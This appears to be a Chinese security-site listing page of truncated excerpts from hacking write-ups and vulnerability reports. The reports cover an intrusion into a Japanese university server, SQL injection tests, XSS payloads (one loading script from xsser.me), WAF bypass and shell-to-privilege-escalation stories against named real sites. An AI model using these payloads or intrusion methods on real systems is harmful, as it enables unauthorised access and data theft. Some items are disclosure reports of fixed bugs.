入侵日本大学教务系统服务器的实例过程 - 网站关注热度:91

想从妹子毕业的学校搞点资料什么的，然后他就YD的渗透了，然后就成功了。然后就把注入的段子发给了我，抓我做壮丁，让我把权提了，顺便写个教程发出来，因为论坛没有太多关于提..[详情]

渗透笔记之脚本入侵（ASP，PHP） - 网站安全 - 自关注热度:14

ASP+ACCESS（MYSQL）简单判定有无漏洞： 粗略型：#39; 1. 数字型：and 1=1 and 1=2 2.字符型：#39; and #39;1#39;=#39;1 #39; and #39;1#39;=#39;2 .....[详情]

wpscan使用方法 - 网站安全 - 自学php关注热度:18

NO1root@bt:/pentest/web/wpscanteam# sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby libxml2 libxml2-dev libxslt1-devNO2root@bt:/pentest/web/wpscanteam# sudo gem install ndash.....[详情]

dedecms 5.7 edit.inc.php文件注射 - 网站安全 - 自学p关注热度:17

漏洞文件edit.inc.php具体代码：?phpif(!defined(#39;DEDEINC#39;)) exit(#39;Request Error!#39;);if(!empty($_COOKIE[#39;GUEST_BOOK_POS#39;])) $GUEST_BOOK_POS = $_COOKIE[#39;GUEST_BOOK_POS.....[详情]

百度某页面存在存储型xss漏洞(已修复) - 网站安全关注热度:19

1、http://developer.baidu.com/bae 开发者页面，用户登录。创建新应用2、创建一个web应用，在名称里可以写入js代码3、应用独立页预览 搜索结果页预览 点击以上两处按钮即是漏洞页面。4、会..[详情]

53kf某频道ROOT注入 - 网站安全 - 自学php关注热度:21

注入url:http://cps1.53kf.com/web_pub_cps_info.php?id=21没有什么好说，看图吧修复方案：参数判断..[详情]

Anwsion 1.1 Beta 2盲注及任意文件下载 - 网站安全关注热度:21

该注入存在个人主页上，由于做了url伪静态，但是还是可以注入http://wenda.anwsion.com/people/296?notification_id-45654..[详情]

taocms评论鸡肋存储型xss及修复 - 网站安全 - 自学关注热度:24

发现以前版本可以xss发数据，最近更新的这个版本，评论过滤了等号（=），暂时没想到怎么发数据出去，谁知道，html中，怎么在没有等号的情况，能发送一次http请求修复方案：替换#..[详情]

taocms代码执行及修复 - 网站安全 - 自学php关注热度:26

看到新的CMS，好奇地下载了源码看了一下。。。是不是我搞错了哦。。怎么写成那样子，好像什么都能调用。。。第一时间看到api.php?phpsession_start();include(#39;config.php#39;);include(SYS_ROOT.I..[详情]

php—mysql 5.0以上手工注入实战 - 网站安全 - 自学关注热度:44

目前php注入工具个人感觉不是很好用，自己用pangolin老是出错，所以决定写一篇php手工注入的例子。手工注入在不同条件下，使用的命令和方法也略为不同，我简单说一下。首先要做的是..[详情]

discuz X2.5 最新漏洞,一个被忽视的物理路径泄漏关注热度:48

之前大家都很重视这俩 物理路径泄漏：之前的两个物理路径泄漏地址：http://www.2cto.com /uc_server/control/admin/db.phphttp://www.2cto.com /source/plugin/myrepeats/table/table_myrepeats.php其实insta.....[详情]

一次简单但又完整的先拿shell后提权的经历 - 网站关注热度:17

前一段时间看到了易趣购物网站爆出了注入漏洞，注入的关键字是关键字：inurl=\#39;#\#39; /span，结合系统本身的后台数据库备份生成目录可以自定义漏洞，轻松可以通过备份xxx.asp的目录..[详情]

禁用java跳过本地验证实例 - 网站安全 - 自学php关注热度:21

目标：http://www.xxoo.com.cnASPX+access的+IIS7.5的站点那么多大神都搞过，要说存在什么注入和编辑器什么的大神们早就搞了！虽然这样扫描还是要扫的，但是我扫的是目录找到后台http://www.x..[详情]

绕过智创防火墙，SQL注入phpweb - 网站安全 - 自学关注热度:23

今天基友xiaoliumang发来一个phpweb的站，然后就一起看了下。phpweb有注入漏洞的，之前说过。先加些语句看了下，可见有注入，而且可以报错。虽然sql语句中我们提交的单引号变成了%27，但..[详情]

详谈如何找到目标站目录 - 网站安全 - 自学php关注热度:68

qq:yueyan@f4ck.net在有目标站的情况下，有很大程度上是不用花大心思去提权的，直接找到目标站目录，通过一些手段获得shell。本文只针对虚拟主机搭建多个网站的情况说明。0x01通过vbs查..[详情]

一次脑筋急转弯sa提权08服务器 - 网站安全 - 自学关注热度:23

目标站：www.2cto.com (代替目标站)首先说一下具体的情况 一大牛发了一个shell 挂个txt收徒、乱码了就算了 省的那大牛找我麻烦心理就想着日一下看看结果真不如人心愿 御剑开骚 哇塞 列目..[详情]

一次dedecms5.7 上传利用 - 网站安全 - 自学php关注热度:23

目标站：http://www.2cto.com (替代目标网址)日他的原因是因为BOY这么老实的一个人 居然被人刷成骗子 通过找那个人的信息看到他的名字是这站的域名很符合 所以就想都没想XXOO （因为BOY老..[详情]

waf绕过策略 - 网站安全 - 自学php关注热度:25

先说明绕过的一些方法并非原创，这里只是做下简单分析说明，另也主要起到归纳的作用网上也有绕过防注入的措施，大致内容不外乎编码之类的。这里引用几个：1，例如常见的URL编码..[详情]

人人网某功能绕过限制跨站 - 网站安全 - 自学p关注热度:26

是这么个情况，绕过人人网客户端限制的存储型XSS人人网好友支持分组管理，在创建好友分组这块，虽然在客户端做了限制，可以轻松突破1客户端的情况是有字数和特殊字符的限制：..[详情]

TaoCms SQL 注入0day - 网站安全 - 自学php关注热度:20

两张图：..[详情]

美图秀秀Andriod客户端反馈意见XSS漏洞 - 网站安全关注热度:32

美图秀秀Andriod版，在意见反馈的地址那里，填上跨站代码，即可跨~图可能有错误，代码应该写在联系方式那里#39;script src=http://xsser.me/pIQKKz/script亲爱的厂商，你把密码写在cookies里面干嘛..[详情]

灯鹭社会化评论框xss - 网站安全 - 自学php关注热度:22

一、约定词解释和说明灯鹭社会化评论框：http://www.denglu.cc/demo.html二、说明灯鹭社会化评论框在直接输入script的情况下是无效的。但目前推出允许插入图片的代码，竟然是以html模式支持..[详情]

xss插入代码和绕过过滤 - 网站安全 - 自学php关注热度:58

代码插入方式 由于插入的脚本为js或者是vbs，所有一般需要由的关键字JavaScript、VbScript、expression比 如IMG SRC=JavaScript：alert（#39;XSS#39;）；，但当接收鼠标或键盘响应时，这三个关键字..[详情]

xss漏洞之进制转换 - 网站安全 - 自学php关注热度:53

SQL注入的事件已经是上个世纪最令人头疼的攻击方法，21世纪又出现了HTML注入漏洞，随着web飞速的发展，XSS漏洞已经不容忽视，简单介绍一下XSS漏洞, 只要有用户输入的地方，就会出现..[详情]

百度知道XSS漏洞(已修复) - 网站安全 - 自学php关注热度:27

该漏洞是在傍晚时发现的，大概在晚上12点的时候被修复了事情的起因是我一同学在百度知道上看到一个很奇怪的，正文带有连接的提问（这里），正常来说，这种情况是不可能出现的。..[详情]

ECShop 2.7.3爆路径 - 网站安全 - 自学php关注热度:29

应该这个功能在发布时就没有测试，很低级的问题，出在文件/demo/ucimport.php文件差不多15行左右---------------code-----------------define(#39;ROOT_PATH#39;,str_replace(#39;\\#39;,#39;/#39;,substr.....[详情]

新浪香港某些应用，越权&sql注入&XSS - 网站关注热度:20

越权：http://cs.sina.com.hk/cgi-bin/admin/answer.cgi?id=85action=enter可对当前数据进行CRUDsql注射（这个应用注射点比较多，自己再找找）：http://misssee.sina.com.hk/cgi-bin/index.cgi?action=viewid=.....[详情]

友荐广告投入充值金额可伪造 - 网站安全 - 自学关注热度:15

友荐广告管理账户充值金额可伪造为0.01元，由于只求个乌云邀请码，so只成功到支付宝支付页面为止，至于最终会是神马情况，没带网银，就请你们去验证了http://www.ujian.cc/pay/checkout1、..[详情]

新理念外语网络教学平台文件上传及修复方案关注热度:25

信息泄露和权限不严导致列目录及上传以某大学的为例:http://www.2cto.com /NPELSNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址setting name=Update_CommonSvr_CommonServ.....[详情]

通过QQ空间日志查找用户IP - 网站安全 - 自学php关注热度:17

通过QQ空间日志，查看用户发日志的IP地址，从日志的源文件里可以查看！得到ip:2354736842, 后面的数字2354736842是一种加密的IP。然后在CMD下ping 2354736842得到的IP是140.90.110.202。然后把IP从后..[详情]